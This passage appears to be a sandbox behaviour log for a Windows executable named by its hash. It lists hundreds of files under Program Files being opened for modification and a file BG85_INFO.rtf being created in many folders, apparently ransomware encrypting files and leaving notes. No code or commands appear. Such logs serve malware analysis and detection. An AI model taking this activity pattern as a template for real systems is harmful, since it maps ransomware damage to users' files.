c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoBeta.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\accessibility.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Maputo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Norfolk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\alt-rt.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Noronha c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.policy c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.bat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kolkata c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Fortaleza c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\platform.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\PST8PDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Simferopol c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Edmonton c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Cairo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\RenameSkip.wmv c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novosibirsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\RestoreNew.mhtml c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Warsaw c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Volgograd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Toronto c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UCT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\UndoCompress.pub c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\bin\server\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\am.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hu.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\Logo.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\javaws.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\fonts\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_it.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\release c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\SavePop.ogg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hi.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qatar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Porto_Velho c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Brunei c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cambridge_Bay c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cuiaba c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Canary c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\El_Salvador c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Louisville c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Recife c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Barbados c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_es.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santo_Domingo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Glace_Bay c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\RenameOpen.ocx c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program 